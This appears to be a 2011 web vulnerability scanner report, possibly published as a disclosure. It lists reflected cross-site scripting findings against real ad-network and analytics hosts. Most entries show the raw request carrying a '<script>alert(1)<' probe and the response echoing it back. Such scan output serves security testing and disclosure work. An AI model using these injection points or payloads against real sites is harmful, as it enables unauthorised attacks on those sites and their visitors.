GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:10:50 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_15669 Content-Length: 6700 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... his.C3VTcallVar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:10:53 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_16190 Content-Length: 6679 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... .c3VJSnuid='16190831 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /v.js |
GET /v.js?id=adver&cid=480c5b46<script>alert(1)< Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:11:14 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html Set-Cookie: SERVERID=s13; path=/ Cache-control: private if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /v.js |
GET /v.js?id=adver96fa8<script>alert(1)< Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:11:14 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html Set-Cookie: SERVERID=s10; path=/ Cache-control: private if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /v.js |
GET /v.js?id=adver&cid=480&t Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://c5.zedo.com/jsc/c5 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 18:11:15 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html Set-Cookie: SERVERID=s12; path=/ Cache-control: private if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.adlegend.com |
Path: | /jscript |
GET /jscript?spacedesc Host: ad.adlegend.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PrefID=43-847748576; CSList=1090846/1088030,0 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 22:37:45 GMT Server: Apache/1.3.37 (Unix) Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://ad Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com Set-Cookie: CSList=1076702/1080850 Content-Type: application/x-javascript Content-Length: 444 Connection: close document.write('<A HREF="http://ad.adlegend ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.adlegend.com |
Path: | /jscript |
GET /jscript?spacedesc Host: ad.adlegend.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PrefID=43-847748576; CSList=1090846/1088030,0 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 22:37:45 GMT Server: Apache/1.3.37 (Unix) Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://ad Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com Set-Cookie: CSList=1076702/1080850 Content-Type: application/x-javascript Content-Length: 447 Connection: close document.write('<A HREF="http://ad.adlegend ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.adlegend.com |
Path: | /jscript |
GET /jscript?spacedesc Host: ad.adlegend.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PrefID=43-847748576; CSList=1090846/1088030,0 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 22:37:45 GMT Server: Apache/1.3.37 (Unix) Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://ad Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com Set-Cookie: CSList=1076702/1080850 Content-Type: application/x-javascript Content-Length: 444 Connection: close document.write('<A HREF="http://ad.adlegend ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 898 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 20:41:52 GMT Expires: Sat, 07 May 2011 20:41:52 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... 4uY29tL3Byb2JhYmxlcy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 07 May 2011 20:41:18 GMT Content-Length: 7439 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:52 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lcmFjaW5nbmF0aW9uLmN ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 07 May 2011 20:41:48 GMT Content-Length: 7435 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:53 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... uYXRpb24uY29tL3Byb2J ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 07 May 2011 20:41:32 GMT Content-Length: 924 document.write('<a target="_blank" href="http://ad ...[SNIP]... W5nbmF0aW9uLmNvbboBC ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 07 May 2011 20:41:43 GMT Content-Length: 7435 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:53 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... OWh0dHA6Ly93d3cuaG9y ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7243 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 20:41:39 GMT Expires: Sat, 07 May 2011 20:41:39 GMT document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:52 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... W9uLmNvbboBCTcyOHg5M v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7374 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 20:41:10 GMT Expires: Sat, 07 May 2011 20:41:10 GMT document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:51 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5315.277603 |
GET /adj/N5315.277603 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.horseraci User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 07 May 2011 20:41:14 GMT Content-Length: 919 document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.yieldmanager |
Path: | /st |
GET /st?ad_type=ad&ad_size Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://adopt.imiclk.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=uid=888a2c66-6932 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 22:39:20 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sat, 07 May 2011 22:39:20 GMT Pragma: no-cache Content-Length: 4324 Age: 0 Proxy-Connection: close /* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=40985<script>alert(1)< Host: adsfac.us Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSDLK001=pctl=311878&fpt |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Sat, 07 May 2011 01:49:21 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FS40985%3Cscript%3Ealert Set-Cookie: FS40985%3Cscript%3Ealert P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 07 May 2011 01:50:20 GMT Connection: close if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=1%0096ee3<script>alert(1)< Host: apps.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 600 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=2546f84ef<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: apps.sapha.com Cookie: sapha_tst_2546=TRUE |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:54:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 682 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8e1fc4<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:14 GMT Date: Sat, 07 May 2011 22:38:14 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"8e1fc4<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:28 GMT Date: Sat, 07 May 2011 22:38:28 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... h-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334f7157<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:31 GMT Date: Sat, 07 May 2011 22:38:31 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... ;b--){f=COMSCORE.beacon(a COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"88164<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113e1990<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:16 GMT Date: Sat, 07 May 2011 22:38:16 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... ction(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113e1990<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:19 GMT Date: Sat, 07 May 2011 22:38:19 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113", c3:"16edfaf<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:20 GMT Date: Sat, 07 May 2011 22:38:20 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... ,f,b;a=a||_comscore;for(b COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"123174a196<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:22 GMT Date: Sat, 07 May 2011 22:38:22 GMT Connection: close Content-Length: 1248 if(typeof COMSCORE=="undefined") ...[SNIP]... omscore;for(b=a.length-1 COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856ff2cf<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sat, 14 May 2011 22:38:25 GMT Date: Sat, 07 May 2011 22:38:25 GMT Connection: close Content-Length: 1249 if(typeof COMSCORE=="undefined") ...[SNIP]... ;for(b=a.length-1;b>=0;b- COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"69f13<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://bid.openx.net |
Path: | /json |
GET /json?c=OXM_60546910506b9c48<script>alert(1)< Host: bid.openx.net Proxy-Connection: keep-alive Referer: http://creative.adonion User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: i=02dd71c0-6aac-4019-82e3 |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Cache-Control: no-cache, must-revalidate P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Set-Cookie: s=6f4ce7c4-85c4-4c44-be2c Set-Cookie: p=1304805367; version=1; path=/; domain=.openx.net; max-age=63072000; OXM_60546910506b9c48<script>alert(1)< |
Severity: | High |
Confidence: | Firm |
Host: | https://broker.gotoassist |
Path: | /h/lbmc |
GET /h/lbmc?Portal=lbmc Host: broker.gotoassist.com Connection: keep-alive Referer: http://www.gotoassist.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:14 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Set-Cookie: dtsSession=SessionInfo Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 9094 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>GoToAssist: live online customer support</title> <script language="JavaScript"> <!-- function empty ...[SNIP]... <input type=text size=18 style="font: normal 10 verdana,arial,helvetica ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
